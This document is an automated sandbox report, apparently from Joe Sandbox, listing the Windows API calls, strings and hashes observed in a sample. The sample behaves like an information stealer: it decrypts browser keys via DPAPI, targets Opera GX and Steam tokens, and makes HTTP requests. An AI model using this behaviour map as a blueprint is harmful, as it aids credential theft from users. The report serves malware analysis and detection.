                                                                                                                                                                                                                • Part of subcall function 009280A1: LocalFree.KERNEL32(0092CB6A,?,?,0092823B,0092CB6A,?,?,?,?,?,?,?,0092CC65,?,?), ref: 009280FD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                              • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                                              • API String ID: 2311102621-738592651
                                                                                                                                                                                                              • Opcode ID: 1d1d6295f70b3aad63fa5759248d3e658b6fad1661cda2c198a415bf450c509b
                                                                                                                                                                                                              • Instruction ID: 163ed7e9b94d6130142a4d7ccc0a502b6d0f2ada3555416a250aee8b4585c646
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d1d6295f70b3aad63fa5759248d3e658b6fad1661cda2c198a415bf450c509b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5521D432E4561AEBCF14EBA0FC41ADEB778EF813A0F104565E920A7195DF34AA49CB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009269C5
                                                                                                                                                                                                                • Part of subcall function 00926963: StrCmpCA.SHLWAPI(?), ref: 009269DF
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926A0E
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00926A4D
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926A7D
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00926A88
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00926AAC
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 009368B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                              • String ID: ERROR$ERROR
                                                                                                                                                                                                              • API String ID: 3086566538-2579291623
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(00B7EF20,0000FFFF,?,?,?,?,?,?,?,?,?,?,0092DADF), ref: 009283F7
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(?,00957194,00B7EF20,0095674E,?,?,?,?,?,?,?,?,0092DADF), ref: 0092844C
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0092DADF), ref: 00928460
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2929475105-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 0093708A
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4198075804-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00934ACD), ref: 00932435
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00934ACD,00934ACD,00000000,?,?,?,00934ACD), ref: 0093245C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00934ACD), ref: 00932473
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1065093856-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00933E2A,00000000,?), ref: 00932241
                                                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0093225C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00932263
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00921385), ref: 00930C66
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00921385), ref: 00930C6D
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00921385), ref: 00930C81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1664310425-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX,0095684E,0095684B,?,?,?), ref: 0092C964
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00931D67: GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                                • Part of subcall function 0092819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0092CC65,?,?), ref: 009281E5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                                                              • String ID: Opera GX
                                                                                                                                                                                                              • API String ID: 1719890681-3280151751
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00927C56,?), ref: 00927B8A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 544645111-3916222277
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 009363BA
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 009363D8
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093605A
                                                                                                                                                                                                                • Part of subcall function 00936013: FindFirstFileA.KERNEL32(?,?), ref: 00936071
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956ABC), ref: 00936092
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956AC0), ref: 009360AC
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 009360D3
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956647), ref: 009360E7
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 00936104
                                                                                                                                                                                                                • Part of subcall function 00936013: PathMatchSpecA.SHLWAPI(?,?), ref: 00936131
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?), ref: 00936167
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956AD8), ref: 00936179
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 0093618C
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956ADC), ref: 0093619E
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 009361B2
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093611B
                                                                                                                                                                                                                • Part of subcall function 00936013: CopyFileA.KERNEL32(?,?,00000001), ref: 0093626B
                                                                                                                                                                                                                • Part of subcall function 00936013: DeleteFileA.KERNEL32(?), ref: 009362DF
                                                                                                                                                                                                                • Part of subcall function 00936013: FindNextFileA.KERNEL32(?,?), ref: 00936341
                                                                                                                                                                                                                • Part of subcall function 00936013: FindClose.KERNEL32(?), ref: 00936355
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2104210347-0
                                                                                                                                                                                                              • Opcode ID: 8337d34e0ff47cfe10a2b2516f5f637645a2c03d3a1dc5deed0861c4243a58de
                                                                                                                                                                                                              • Instruction ID: 9409a920fc964112a7f3f24999c7d8edc5ca8dfe3ef380103f7ac59be36985f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8337d34e0ff47cfe10a2b2516f5f637645a2c03d3a1dc5deed0861c4243a58de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C931A17680011DAFDF16EB60DC03EE877B9EF98304F440499BA08A7261DE719AE59F52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0093718A
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Soft\Steam\steam_tokens.txt, xrefs: 0093719A
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                              • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                              • API String ID: 502913869-3507145866
                                                                                                                                                                                                              • Opcode ID: 3e28f3bfe2a8ffaac1d7de4c759c88c4ff2baaa27efa4497022339b86a71d66b
                                                                                                                                                                                                              • Instruction ID: ca04c426250bfd3832b7ff428657ebe2628fd69632b3c6254b5172ac2256dd0e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e28f3bfe2a8ffaac1d7de4c759c88c4ff2baaa27efa4497022339b86a71d66b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A901FF36D40119ABCF00FBE5ED47ACEBB78AEC4354F504261FA4073126DB316A598BD1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00927C18,?,?), ref: 0092784A
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00927874
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: 83520060fa5e5f96387b96e5001363befb87a8ade7d713e13ca1647dd40b8181
                                                                                                                                                                                                              • Instruction ID: ecd17e195d8c27206533f8d9104c2a4a49a83504e7cb6ca71f0b4c86fe6bbe5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83520060fa5e5f96387b96e5001363befb87a8ade7d713e13ca1647dd40b8181
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B11D371A04716ABC724CFF8D9C9BAAF7F8EB44714F24086CE61AE7290D270E940CB14
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 0093CD5A
                                                                                                                                                                                                                • Part of subcall function 0093BCFD: lstrlenA.KERNEL32(?,0093CD6B,0093CE0D,00000000,06400000,00000003,00000000,0093770B,.exe,00956C64,00956C60,00956C5C,00956C58,00956C54,00956C50,00956C4C), ref: 0093BD2F
                                                                                                                                                                                                                • Part of subcall function 0093BCFD: malloc.MSVCRT ref: 0093BD37
                                                                                                                                                                                                                • Part of subcall function 0093BCFD: lstrcpyA.KERNEL32(00000000,?), ref: 0093BD42
                                                                                                                                                                                                              • malloc.MSVCRT ref: 0093CD97
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2974738957-0
                                                                                                                                                                                                              • Opcode ID: 04803b8001b3e0224828e740c4f21ca98d9c91830676c9d428051e3c7e0b1b81
                                                                                                                                                                                                              • Instruction ID: 958e5be73f6113a64e06eaa92ee62c61040b85f72da51869a99b4affea65ae1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04803b8001b3e0224828e740c4f21ca98d9c91830676c9d428051e3c7e0b1b81
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F0BBB65056115BD7206F69DC40A5A7F99FF84760F154131FE28AB281DA30DC008BF1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FolderPathlstrcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1699248803-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 0093254C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileOperation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3080627654-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocLocal
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC22120,6CAD7E60), ref: 6CAD6EBC
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD6EDF
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD6EF3
                                                                                                                                                                                                              • PR_WaitCondVar.NSS3(000000FF), ref: 6CAD6F25
                                                                                                                                                                                                                • Part of subcall function 6CAAA900: TlsGetValue.KERNEL32(00000000,?,6CC214E4,?,6CA44DD9), ref: 6CAAA90F
                                                                                                                                                                                                                • Part of subcall function 6CAAA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CAAA94F
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD6F68
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000008), ref: 6CAD6FA9
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD70B4
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CAD70C8
